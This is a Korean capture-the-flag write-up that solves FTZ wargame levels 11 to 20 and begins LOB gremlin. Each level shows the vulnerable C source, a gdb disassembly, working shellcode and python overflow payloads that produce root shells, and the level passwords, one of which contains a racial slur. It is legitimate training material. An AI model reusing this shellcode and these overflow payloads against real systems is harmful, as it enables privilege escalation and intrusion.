0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1

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Download "0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1"


1 FTZ LEVEL11 #include <stdio.h> #include <stdlib.h> int main( int argc, char *argv[] ) { char str[256]; setreuid( 3092, 3092 ); strcpy( str, argv[1] ); printf( str ); gdb 를이용해분석해보면 [level11@ftz level11]$ gdb -q attackme (gdb) set disas main Undefined item: "main". (gdb) set disas intel (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x108 0x <main+9>: sub esp,0x8 0x c <main+12>: push 0xc14 0x <main+17>: push 0xc14 0x <main+22>: call 0x804834c <setreuid> 0x b <main+27>: add esp,0x10 0x e <main+30>: sub esp,0x8 0x <main+33>: mov eax,dword PTR [ebp+12] 0x <main+36>: add eax,0x4 0x <main+39>: push DWORD PTR [eax]

2 0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x10 0x080484a8 <main+56>: sub esp,0xc 0x080484ab <main+59>: lea eax,[ebp-264] 0x080484b1 <main+65>: push eax 0x080484b2 <main+66>: call 0x804833c <printf> 0x080484b7 <main+71>: add esp,0x10 0x080484ba <main+74>: leave 0x080484bb <main+75>: ret 0x080484bc <main+76>: nop 0x080484bd <main+77>: nop 0x080484be <main+78>: nop 0x080484bf <main+79>: nop End of assembler dump. main+48에서 <strcpy> 를콜하므로그전에넣을인자값을셋팅해야한다. <strcpy> 의인자값에 str[] 이있기때문에 str의시작은 ebp-264 지점이다. 따라서메모리구조는 str[256] dummy[8] sfp ret 환경변수를이용하여쉘코드를넣고쉘코드의시작주소를 ret에넣으면된다. getenv.c #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { char *p; p = getenv(argv[1]);

3 if(p!= NULL) { printf("%s=%p\n",argv[1],p); return 0; 이 C 코드는입력한환경변수의주소를알려주는코드이다. 환경변수를추가시키고 [level11@ftz tmp]$ export EGG="`python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89 \xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"`" 환경변수의주소를알아내면 [level11@ftz tmp]$./getenv EGG EGG=0xbffffc37 이제문제를풀면 쓰레기값 \x37\xfc\xff\xbf [level11@ftz level11]$./attackme `python -c "print 'A'*268+'\x37\xfc\xff\xbf'"` sh-2.05b$ my-pass TERM environment variable not set. Level12 Password is "it is like this".

4 FTZ LEVEL12 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main( void ) { char str[256]; setreuid( 3093, 3093 ); printf( " 문장을입력하세요.\n" ); gets( str ); printf( "%s\n", str ); gdb 를이용해분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x108 0x <main+9>: sub esp,0x8 0x c <main+12>: push 0xc15 0x <main+17>: push 0xc15 0x <main+22>: call 0x804835c <setreuid> 0x b <main+27>: add esp,0x10 0x e <main+30>: sub esp,0xc 0x <main+33>: push 0x x <main+38>: call 0x804834c <printf> 0x b <main+43>: add esp,0x10 0x e <main+46>: sub esp,0xc 0x080484a1 <main+49>: lea eax,[ebp-264] 0x080484a7 <main+55>: push eax

5 0x080484a8 <main+56>: call 0x804831c <gets> 0x080484ad <main+61>: add esp,0x10 0x080484b0 <main+64>: sub esp,0x8 0x080484b3 <main+67>: lea eax,[ebp-264] 0x080484b9 <main+73>: push eax 0x080484ba <main+74>: push 0x804854c 0x080484bf <main+79>: call 0x804834c <printf> 0x080484c4 <main+84>: add esp,0x10 0x080484c7 <main+87>: leave 0x080484c8 <main+88>: ret 0x080484c9 <main+89>: lea esi,[esi] 0x080484cc <main+92>: nop 0x080484cd <main+93>: nop 0x080484ce <main+94>: nop 0x080484cf <main+95>: nop End of assembler dump. 메모리구조를그리면 str[256] dummy[8] sfp ret 쓰레기값268 + 쉘주소똑같이환경변수를이용해풀면 (... 생략...) [level12@ftz level12]$ /tmp/ge EGG EGG=0xbffffc3d gets 를이용해입력을받기때문에파이프를이용해야한다. [level12@ftz level12]$ (python -c "print 'A'*268+'\x3d\xfc\xff\xbf'";cat)./attackme 문장을입력하세요. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

6 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=? my-pass TERM environment variable not set. Level13 Password is "have no clue". FTZ LEVEL13 #include <stdlib.h> main(int argc, char *argv[]) { long i=0x ; char buf[1024]; setreuid( 3094, 3094 ); if(argc > 1) strcpy(buf,argv[1]); if(i!= 0x ) { printf(" Warnning: Buffer Overflow!!! \n"); kill(0,11); gdb 를이용히여 (gdb) disas main Dump of assembler code for function main: 0x080484a0 <main+0>: push ebp 0x080484a1 <main+1>: mov ebp,esp 0x080484a3 <main+3>: sub esp,0x418 0x080484a9 <main+9>: mov DWORD PTR [ebp-12],0x x080484b0 <main+16>: sub esp,0x8

7 0x080484b3 <main+19>: push 0xc16 0x080484b8 <main+24>: push 0xc16 0x080484bd <main+29>: call 0x <setreuid> 0x080484c2 <main+34>: add esp,0x10 0x080484c5 <main+37>: cmp DWORD PTR [ebp+8],0x1 0x080484c9 <main+41>: jle 0x80484e5 <main+69> 0x080484cb <main+43>: sub esp,0x8 0x080484ce <main+46>: mov eax,dword PTR [ebp+12] 0x080484d1 <main+49>: add eax,0x4 0x080484d4 <main+52>: push DWORD PTR [eax] 0x080484d6 <main+54>: lea eax,[ebp-1048] 0x080484dc <main+60>: push eax 0x080484dd <main+61>: call 0x <strcpy> 0x080484e2 <main+66>: add esp,0x10 0x080484e5 <main+69>: cmp DWORD PTR [ebp-12],0x x080484ec <main+76>: je 0x804850d <main+109> 0x080484ee <main+78>: sub esp,0xc 0x080484f1 <main+81>: push 0x80485a0 0x080484f6 <main+86>: call 0x <printf> 0x080484fb <main+91>: add esp,0x10 0x080484fe <main+94>: sub esp,0x8 0x <main+97>: push 0xb 0x <main+99>: push 0x0 0x <main+101>: call 0x <kill> 0x a <main+106>: add esp,0x10 0x d <main+109>: leave 0x e <main+110>: ret 0x f <main+111>: nop End of assembler dump. ebp-12 부분이 0x 이아니라면프로그램이종료된다. 따라서환경변 수를이용해쉘코드의주소를구한다음 ebp-12 부분에 0x 를넣어주 면된다.

8 환경변수를이용해주소를구하면 (... 생략...) level13]$ /tmp/ge EGG EGG=0xbffffc3d 메모리구조를보면 buf[1024] dummy[12] i[4] dummy[8] sfp ret 쓰레기값 \x67\x45\x23\x01 + 쓰레기값12 + 쉘주소공격을하면 [level13@ftz level13]$./attackme `python -c "print 'A'*1036+'\x67\x45\x23\x01'+'A'*12+'\x3d\xfc\xff\xbf'"` sh-2.05b$ my-pass TERM environment variable not set. Level14 Password is "what that nigga want?". FTZ LEVEL14 #include <stdio.h> #include <unistd.h> main() { int crap; int check; char buf[20]; fgets(buf,45,stdin); if (check==0xdeadbeef) { setreuid(3095,3095); system("/bin/sh"); C 언어코드를보니 fgets 를이용하여입력을받는데 45byte 만큼의데이터를 받아버퍼오버플로우가일어난다. 그리고 if 문에서 deadbeef 를검사한

9 다. gdb를이용하여분석해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x38 0x <main+6>: sub esp,0x4 0x <main+9>: push ds:0x x f <main+15>: push 0x2d 0x080484a1 <main+17>: lea eax,[ebp-56] 0x080484a4 <main+20>: push eax 0x080484a5 <main+21>: call 0x <fgets> 0x080484aa <main+26>: add esp,0x10 0x080484ad <main+29>: cmp DWORD PTR [ebp-16],0xdeadbeef 0x080484b4 <main+36>: jne 0x80484db <main+75> 0x080484b6 <main+38>: sub esp,0x8 0x080484b9 <main+41>: push 0xc17 0x080484be <main+46>: push 0xc17 0x080484c3 <main+51>: call 0x <setreuid> 0x080484c8 <main+56>: add esp,0x10 0x080484cb <main+59>: sub esp,0xc 0x080484ce <main+62>: push 0x x080484d3 <main+67>: call 0x <system> 0x080484d8 <main+72>: add esp,0x10 0x080484db <main+75>: leave 0x080484dc <main+76>: ret 0x080484dd <main+77>: lea esi,[esi] End of assembler dump. fgets의인자중에 buf가있으므로 main+17부분에서 buf를불러온다. 이때 buf의시작은 ebp-56인것을알수있다. main+29 부분에서 ebp-16과 deadbeef 를비교하므로 ebp-16부분에 deadbeef 를넣으면쉘을딸수있다.

10 메모리구조를그려보면 buf[20] dummy[20] deadbeef dummy[12] sfp ret 쓰레기값40 + \xef\xbe\xad\xde 공격을하면 [level14@ftz level14]$ (python -c "print 'A'*40+'\xef\xbe\xad\xde'";cat)./attackme my-pass Level15 Password is "guess what". FTZ LEVEL15 #include <stdio.h> main() { int crap; int *check; char buf[20]; fgets(buf,45,stdin); if (*check==0xdeadbeef) { setreuid(3096,3096); system("/bin/sh"); 전문제와굉장히비슷한문제인데다른점이 check 가포인터가되었다는 것이다 그래도 gdb 로분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp

11 0x <main+3>: sub esp,0x38 0x <main+6>: sub esp,0x4 0x <main+9>: push ds:0x x f <main+15>: push 0x2d 0x080484a1 <main+17>: lea eax,[ebp-56] 0x080484a4 <main+20>: push eax 0x080484a5 <main+21>: call 0x <fgets> 0x080484aa <main+26>: add esp,0x10 0x080484ad <main+29>: mov eax,dword PTR [ebp-16] 0x080484b0 <main+32>: cmp DWORD PTR [eax],0xdeadbeef 0x080484b6 <main+38>: jne 0x80484dd <main+77> 0x080484b8 <main+40>: sub esp,0x8 0x080484bb <main+43>: push 0xc18 0x080484c0 <main+48>: push 0xc18 0x080484c5 <main+53>: call 0x <setreuid> 0x080484ca <main+58>: add esp,0x10 0x080484cd <main+61>: sub esp,0xc 0x080484d0 <main+64>: push 0x x080484d5 <main+69>: call 0x <system> 0x080484da <main+74>: add esp,0x10 0x080484dd <main+77>: leave 0x080484de <main+78>: ret 0x080484df <main+79>: nop End of assembler dump. level14와다똑같은데 main+29지점에서주소에있는값을비교하므로메모리안에있는 deadbeef를 ebp-16이그곳을가리키도록주소를넣어주면된다. 메모리구조를그려보면 buf[20] dummy[20] deadbeef의주소값 dummy[12] sfp ret 쓰레기값40 + deadbeef의주소값 이번공격에서는 cmp 로비교하는구문근처에서 deadbeef 을찾아시작주소 를 ebp-16 지점에넣겠다.

12 (gdb) x/16x 0x080484b0 0x80484b0 <main+32>: 0xbeef3881 0x2575dead 0x6808ec83 0x00000c18 0x80484c0 <main+48>: 0x000c1868 0xfeb6e800 0xc483ffff 0x0cec8310 0x80484d0 <main+64>: 0x xfe66e808 0xc483ffff 0x90c3c910 (gdb) x/16x 0x080484b2 0x80484b2 <main+34>: 0xdeadbeef 0xec x0c x x80484c2 <main+50>: 0xe800000c 0xfffffeb6 0x8310c483 0x48680cec 0x80484d2 <main+66>: 0xe xfffffe66 0xc910c483 0x895590c3 deadbeef 의주소가 0x080484b2 라는것을알았다. 공격을하면 level15]$ (python -c "print 'A'*40+'\xb2\x84\x04\x08'";cat)./attackme my-pass Level16 Password is "about to cause mass". FTZ LEVEL16 #include <stdio.h> void shell() { setreuid(3097,3097); system("/bin/sh"); void printit() { printf("hello there!\n"); main() { int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); call(); shell() 함수의시작주소를 call() 함수를호출하는곳에넣으면쉘을획득할수있을것같다.

13 gdb 를이용해서분석을해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x b <main+3>: sub esp,0x38 0x e <main+6>: mov DWORD PTR [ebp-16],0x x <main+13>: sub esp,0x4 0x <main+16>: push ds:0x80496e8 0x e <main+22>: push 0x30 0x <main+24>: lea eax,[ebp-56] 0x <main+27>: push eax 0x <main+28>: call 0x <fgets> 0x <main+33>: add esp,0x10 0x c <main+36>: mov eax,dword PTR [ebp-16] 0x f <main+39>: call eax 0x <main+41>: leave 0x <main+42>: ret 0x <main+43>: nop 0x <main+44>: nop 0x <main+45>: nop 0x <main+46>: nop 0x <main+47>: nop 0x <main+48>: nop 0x <main+49>: nop 0x a <main+50>: nop 0x b <main+51>: nop 0x c <main+52>: nop 0x d <main+53>: nop 0x e <main+54>: nop 0x f <main+55>: nop End of assembler dump. buf의시작주소는 ebp-56이고, main+6 부분에서 printit 함수의주소를 ebp-16부분에넣고있고, main+36에서 ebp-16부분에있는값을 eax에넣고 call 한다. 따라서 ebp-16부분에 shell() 함수의시작주소를넣고익스플로잇하겠다.

14 (gdb) disas shell Dump of assembler code for function shell: 0x080484d0 <shell+0>: push ebp 0x080484d1 <shell+1>: mov ebp,esp 0x080484d3 <shell+3>: sub esp,0x8 0x080484d6 <shell+6>: sub esp,0x8 0x080484d9 <shell+9>: push 0xc19 0x080484de <shell+14>: push 0xc19 0x080484e3 <shell+19>: call 0x80483b4 <setreuid> 0x080484e8 <shell+24>: add esp,0x10 0x080484eb <shell+27>: sub esp,0xc 0x080484ee <shell+30>: push 0x80485b8 0x080484f3 <shell+35>: call 0x <system> 0x080484f8 <shell+40>: add esp,0x10 0x080484fb <shell+43>: leave 0x080484fc <shell+44>: ret 0x080484fd <shell+45>: lea esi,[esi] End of assembler dump. shell 의시작주소는 0x080484d0 이다. 쓰레기값 40 + shell() 의시작주소 공격을하면 [level16@ftz level16]$ (python -c "print 'A'*40+'\xd0\x84\x04\x08'";cat)./attackme my-pass Level17 Password is "king poetic". FTZ LEVEL17 #include <stdio.h> void printit() { printf("hello there!\n"); main()

15 { int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); setreuid(3098,3098); call(); 저번문제와달리 shell() 함수가없어져서직접쉘코드를환경변수에올려서 call() 함수를호출하는부분을 shellcode의시작주소로바꾸겠다. 환경변수를올려주소를찾아보겠다. 주소를찾는코드는위에있으니참고해서구하겠다. level17]$ export EGG="`python -c "print '\x90'*100+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\ x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"`" level17]$ /tmp/ge EGG EGG=0xbffffc3d 그럼이제 gdb 를이용해서분석해보면 (gdb) disas main Dump of assembler code for function main: 0x080484a8 <main+0>: push ebp 0x080484a9 <main+1>: mov ebp,esp 0x080484ab <main+3>: sub esp,0x38 0x080484ae <main+6>: mov DWORD PTR [ebp-16],0x x080484b5 <main+13>: sub esp,0x4 0x080484b8 <main+16>: push ds:0x804967c 0x080484be <main+22>: push 0x30 0x080484c0 <main+24>: lea eax,[ebp-56] 0x080484c3 <main+27>: push eax 0x080484c4 <main+28>: call 0x <fgets> 0x080484c9 <main+33>: add esp,0x10 0x080484cc <main+36>: sub esp,0x8 0x080484cf <main+39>: push 0xc1a 0x080484d4 <main+44>: push 0xc1a 0x080484d9 <main+49>: call 0x <setreuid> 0x080484de <main+54>: add esp,0x10 0x080484e1 <main+57>: mov eax,dword PTR [ebp-16] 0x080484e4 <main+60>: call eax

16 0x080484e6 <main+62>: leave 0x080484e7 <main+63>: ret 0x080484e8 <main+64>: nop 0x080484e9 <main+65>: nop 0x080484ea <main+66>: nop 0x080484eb <main+67>: nop 0x080484ec <main+68>: nop 0x080484ed <main+69>: nop 0x080484ee <main+70>: nop 0x080484ef <main+71>: nop End of assembler dump. printit() 함수의주소가 ebp-16에올라가고, buf는 ebp-56에올라간다. 따라서환경변수의주소를 ebp-16에넣어주면쉽게풀릴것같다. 쓰레기값 40 + 환경변수주소 공격을하면 [level17@ftz level17]$ (python -c "print 'A'*40+'\x3d\xfc\xff\xbf'";cat)./attackme my-pass TERM environment variable not set. Level18 Password is "why did you do it". FTZ LEVEL18 #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> void shellout(void); int main() { char string[100]; int check; int x = 0; int count = 0; fd_set fds; printf("enter your command: "); fflush(stdout); while(1)

17 { if(count >= 100) printf("what are you trying to do?\n"); if(check == 0xdeadbeef) shellout(); else { FD_ZERO(&fds); FD_SET(STDIN_FILENO,&fds); if(select(fd_setsize, &fds, NULL, NULL, NULL) >= 1) { if(fd_isset(fileno(stdin),&fds)) { read(fileno(stdin),&x,1); switch(x) { case '\r': case '\n': printf("\a"); break; case 0x08: count--; printf("\b \b"); break; default: string[count] = x; count++; break; void shellout(void) { setreuid(3099,3099); execl("/bin/sh","sh",null);

18 여러 c코드들이있지만 string 배열보다 check가늦게선언되어스택의특성상 check 부분을원하는값으로덮는것이불가능하다. 하지만 case문에서 0x08이 count를 해주고, defalut에서 string[count] 에 x를넣어준다. 따라서 count를음수로잡으면 string전에있는메모리도변조할수있을것이다. gdb 를이용해분석을해보겠다. (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x100 0x <main+9>: push edi 0x a <main+10>: push esi 0x b <main+11>: push ebx 0x c <main+12>: mov DWORD PTR [ebp-108],0x0 0x <main+19>: mov DWORD PTR [ebp-112],0x0 0x a <main+26>: push 0x x f <main+31>: call 0x <printf> 0x <main+36>: add esp,0x4 0x <main+39>: mov eax,ds:0x804993c 0x c <main+44>: mov DWORD PTR [ebp-252],eax 0x <main+50>: mov ecx,dword PTR [ebp-252] 0x <main+56>: push ecx 0x <main+57>: call 0x <fflush> 0x e <main+62>: add esp,0x4 0x <main+65>: jmp 0x <main+72> 0x <main+67>: jmp 0x <main+549> 0x <main+72>: cmp DWORD PTR [ebp-112],0x63 0x c <main+76>: jle 0x80485ab <main+91> 0x e <main+78>: push 0x x080485a3 <main+83>: call 0x <printf> 0x080485a8 <main+88>: add esp,0x4 0x080485ab <main+91>: cmp DWORD PTR [ebp-104],0xdeadbeef 0x080485b2 <main+98>: jne 0x80485c0 <main+112> 0x080485b4 <main+100>: call 0x <shellout> 0x080485b9 <main+105>: jmp 0x <main+544>

19 0x080485be <main+110>: mov esi,esi 0x080485c0 <main+112>: lea edi,[ebp-240] 0x080485c6 <main+118>: mov DWORD PTR [ebp-252],edi 0x080485cc <main+124>: mov ecx,0x20 0x080485d1 <main+129>: mov edi,dword PTR [ebp-252] 0x080485d7 <main+135>: xor eax,eax 0x080485d9 <main+137>: cld 0x080485da <main+138>: repz stos es:[edi],eax 0x080485dc <main+140>: mov DWORD PTR [ebp-244],ecx ---Type <return> to continue, or q <return> to quit--- 0x080485e2 <main+146>: mov DWORD PTR [ebp-248],edi 0x080485e8 <main+152>: jmp 0x80485f2 <main+162> 0x080485ea <main+154>: lea esi,[esi] 0x080485f0 <main+160>: jmp 0x80485c0 <main+112> 0x080485f2 <main+162>: xor eax,eax 0x080485f4 <main+164>: bts DWORD PTR [ebp-240],eax 0x080485fb <main+171>: push 0x0 0x080485fd <main+173>: push 0x0 0x080485ff <main+175>: push 0x0 0x <main+177>: lea ecx,[ebp-240] 0x <main+183>: mov DWORD PTR [ebp-252],ecx 0x d <main+189>: mov edi,dword PTR [ebp-252] 0x <main+195>: push edi 0x <main+196>: push 0x400 0x <main+201>: call 0x <select> 0x e <main+206>: add esp,0x14 0x <main+209>: mov DWORD PTR [ebp-252],eax 0x <main+215>: cmp DWORD PTR [ebp-252],0x0 0x e <main+222>: jle 0x <main+544> 0x <main+228>: mov eax,ds:0x x <main+233>: mov DWORD PTR [ebp-252],eax 0x f <main+239>: mov ecx,dword PTR [ebp-252] 0x <main+245>: push ecx 0x <main+246>: call 0x <fileno> 0x b <main+251>: add esp,0x4 0x e <main+254>: mov DWORD PTR [ebp-252],eax 0x <main+260>: mov esi,dword PTR [ebp-252] 0x a <main+266>: and esi,0x1f 0x d <main+269>: mov edi,ds:0x x <main+275>: mov DWORD PTR [ebp-252],edi

20 0x <main+281>: mov eax,dword PTR [ebp-252] 0x f <main+287>: push eax 0x <main+288>: call 0x <fileno> 0x <main+293>: add esp,0x4 0x <main+296>: mov DWORD PTR [ebp-252],eax 0x e <main+302>: mov edx,dword PTR [ebp-252] 0x <main+308>: shr edx,0x5 0x <main+311>: lea ecx,[edx*4] ---Type <return> to continue, or q <return> to quit--- 0x e <main+318>: mov DWORD PTR [ebp-252],ecx 0x <main+324>: lea edx,[ebp-240] 0x a <main+330>: mov edi,dword PTR [ebp-252] 0x080486a0 <main+336>: bt DWORD PTR [edi+edx],esi 0x080486a4 <main+340>: setb bl 0x080486a7 <main+343>: test bl,bl 0x080486a9 <main+345>: je 0x <main+544> 0x080486af <main+351>: push 0x1 0x080486b1 <main+353>: lea eax,[ebp-108] 0x080486b4 <main+356>: mov DWORD PTR [ebp-252],eax 0x080486ba <main+362>: mov ecx,dword PTR [ebp-252] 0x080486c0 <main+368>: push ecx 0x080486c1 <main+369>: mov edi,ds:0x x080486c7 <main+375>: mov DWORD PTR [ebp-252],edi 0x080486cd <main+381>: mov eax,dword PTR [ebp-252] 0x080486d3 <main+387>: push eax 0x080486d4 <main+388>: call 0x <fileno> 0x080486d9 <main+393>: add esp,0x4 0x080486dc <main+396>: mov DWORD PTR [ebp-252],eax 0x080486e2 <main+402>: mov ecx,dword PTR [ebp-252] 0x080486e8 <main+408>: push ecx 0x080486e9 <main+409>: call 0x <read> 0x080486ee <main+414>: add esp,0xc 0x080486f1 <main+417>: mov edi,dword PTR [ebp-108] 0x080486f4 <main+420>: mov DWORD PTR [ebp-252],edi 0x080486fa <main+426>: cmp DWORD PTR [ebp-252],0xa 0x <main+433>: je 0x <main+466> 0x <main+435>: cmp DWORD PTR [ebp-252],0xa 0x a <main+442>: jg 0x <main+455> 0x c <main+444>: cmp DWORD PTR [ebp-252],0x8 0x <main+451>: je 0x <main+481>

21 0x <main+453>: jmp 0x <main+499> 0x <main+455>: cmp DWORD PTR [ebp-252],0xd 0x e <main+462>: je 0x <main+466> 0x <main+464>: jmp 0x <main+499> 0x <main+466>: push 0x x <main+471>: call 0x <printf> 0x c <main+476>: add esp,0x4 ---Type <return> to continue, or q <return> to quit--- 0x f <main+479>: jmp 0x <main+544> 0x <main+481>: dec DWORD PTR [ebp-112] 0x <main+484>: push 0x x <main+489>: call 0x <printf> 0x e <main+494>: add esp,0x4 0x <main+497>: jmp 0x <main+544> 0x <main+499>: lea eax,[ebp-100] 0x <main+502>: mov DWORD PTR [ebp-252],eax 0x c <main+508>: mov edx,dword PTR [ebp-112] 0x f <main+511>: mov cl,byte PTR [ebp-108] 0x <main+514>: mov BYTE PTR [ebp-253],cl 0x <main+520>: mov al,byte PTR [ebp-253] 0x e <main+526>: mov ecx,dword PTR [ebp-252] 0x <main+532>: mov BYTE PTR [edx+ecx],al 0x <main+535>: inc DWORD PTR [ebp-112] 0x a <main+538>: jmp 0x <main+544> 0x c <main+540>: lea esi,[esi*1] 0x <main+544>: jmp 0x <main+65> 0x <main+549>: lea esp,[ebp-268] 0x b <main+555>: pop ebx 0x c <main+556>: pop esi 0x d <main+557>: pop edi 0x e <main+558>: leave 0x f <main+559>: ret End of assembler dump. 코드가긴만큼어셈코드도굉장히길다. 하지만우리에게필요한것은 string의시작, check의시작, shellout() 함수의시작부분이다. 우선우리가필요한코드만잘라보겠다. 0x b <main+11>: push ebx 0x c <main+12>: mov DWORD PTR [ebp-108],0x0 0x <main+19>: mov DWORD PTR [ebp-112],0x0 0x a <main+26>: push 0x

22 ebp-108 부분과 ebp-112 부분을 0 으로초기화시키고있다. c 코드와비교해 서보면 ebp-108 는 x 이고,ebp-112 는 count 라는것을알수있다. 0x080485a3 <main+83>: call 0x <printf> 0x080485a8 <main+88>: add esp,0x4 0x080485ab <main+91>: cmp DWORD PTR [ebp-104],0xdeadbeef 0x080485b2 <main+98>: jne 0x80485c0 <main+112> 0x080485b4 <main+100>: call 0x <shellout> deadbeef에서비교하는 main+91 부분에서 check가 ebp-104부분이라는것을알았다. 0x <main+499>: lea eax,[ebp-100] 0x <main+502>: mov DWORD PTR [ebp-252],eax 0x c <main+508>: mov edx,dword PTR [ebp-112] 0x f <main+511>: mov cl,byte PTR [ebp-108] 0x <main+514>: mov BYTE PTR [ebp-253],cl 0x <main+520>: mov al,byte PTR [ebp-253] 0x e <main+526>: mov ecx,dword PTR [ebp-252] 0x <main+532>: mov BYTE PTR [edx+ecx],al 0x <main+535>: inc DWORD PTR [ebp-112] 0x a <main+538>: jmp 0x <main+544> switch문안에있는 default문이다. 여기서 string이 ebp-100에위치한다는것을알았다. eax에 string을넣고, string을다시 ebp-252부분에넣는다. 그다음 count를 edx에넣고, x를 cl에넣는다. 현재 eax와 ebp-252 부분에는 string이, edx에는 count가, cl에는 x가들어가있다. 그다음 cl을 ebp-253에넣고다시 ebp-253을 al에넣는다. 다음 ebp-252를 ecx에넣는다. 그럼현재 eax와 ebp-252,ecx 부분에는 string이, edx에는 count가, cl, ebp-253, al에는 x가들어가있다. main+532 부분에서 string의 count 번째수에 x를넣어준다. 어셈블리어에서배열에값를넣을때는어셈명령어 mov를쓰고넣는값의크기에따라 1byte면 BYTE PTR, 2byte면 WRORD PTR,4byte면 DWORD PTR라고쓴다. 그다음 [ 넣는번째 + 배열이름 ], 넣는값형식으로쓴다. 여태까지수집한정보를정리하면 string : ebp-100, count : ebp-112, x : ebp-108,

23 check : ebp-104 string 에입력을받을때 count 를 4 줄이고그부분에 deadbeef 를넣으면되 겠다. \x08 * 4 + shellout() 함수의시작주소 공격을해보겠다. [level18@ftz level18]$ (python -c "print '\x08'*4+'\xef\xbe\xad\xde'";cat)./attackme Enter your command: id uid=3099(level19) gid=3098(level18) groups=3098(level18) my-pass Level19 Password is "swimming in pink". FTZ LEVEL19 main() { char buf[20]; gets(buf); printf("%s\n",buf); 코드가굉장히간단하다. 하지만그전까지는 c코드에서권한상승을 setreuid를해주었다. 하지만이코드에는권한상승이없다. 여태까지사용했던쉘코드는단순히 /bin/sh 명령어를실행시켜주는것이였으므로 setreuid+/bin/sh 를해주는쉘코드를사용하겠다. 사용한쉘코드는이것이다. \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2 f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 이쉘코드를환경변수에올린다음주소로 ret 를덮겠다. 환경변수를등록해주소를아는과정은생략하겠다. 앞에나온 level 의과 정을따라하면된다.

24 gdb 를이용해분석해보면 (gdb) disas main Dump of assembler code for function main: 0x <main+0>: push ebp 0x <main+1>: mov ebp,esp 0x <main+3>: sub esp,0x28 0x <main+6>: sub esp,0xc 0x <main+9>: lea eax,[ebp-40] 0x c <main+12>: push eax 0x d <main+13>: call 0x80482f4 <gets> 0x <main+18>: add esp,0x10 0x <main+21>: sub esp,0x8 0x <main+24>: lea eax,[ebp-40] 0x b <main+27>: push eax 0x c <main+28>: push 0x80484d8 0x <main+33>: call 0x <printf> 0x <main+38>: add esp,0x10 0x <main+41>: leave 0x a <main+42>: ret 0x b <main+43>: nop 0x c <main+44>: nop 0x d <main+45>: nop 0x e <main+46>: nop 0x f <main+47>: nop End of assembler dump. buf 의위치가 ebp-40 이라는것을알았다. 쓰레기값 44 + 환경변수 EGG 의주소 공격을해보면 [level19@ftz level19]$ (python -c "print 'A'*44+'\x2d\xfc\xff\xbf'";cat)./attackme AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-? my-pass TERM environment variable not set. Level20 Password is "we are just regular guys".

25 FTZ LEVEL20 #include <stdio.h> main(int argc,char **argv) { char bleh[80]; setreuid(3101,3101); fgets(bleh,79,stdin); printf(bleh); bleh의크기가 80인데 fgets를이용해서 79만큼을입력받는다. 따라서 bof 공격은아니라는것을알았다. 이번문제는포맷스트링버그를이용한공격인것같다. printf() 함수를특별한서식문자를사용하지않고출력을하고있다. LOB (gate -> gremlin) /* */ The Lord of the BOF : The Fellowship of the BOF - gremlin - simple BOF int main(int argc, char *argv[]) { char buffer[256]; if(argc < 2){ printf("argv error\n"); exit(0); strcpy(buffer, argv[1]); printf("%s\n", buffer); 전형적인 BOF 문제이다. main함수의인자가 2개이하면프로그램이종료된다. 환경변수에쉘코드를넣은후 buffer와 sfp를덮고환경변수의주소로 ret를덮겠다. 환경변수를넣는것은많이했으므로따로설명하지는않겠다. 위에있다. [gate@localhost gate]$ /tmp/ge EGG

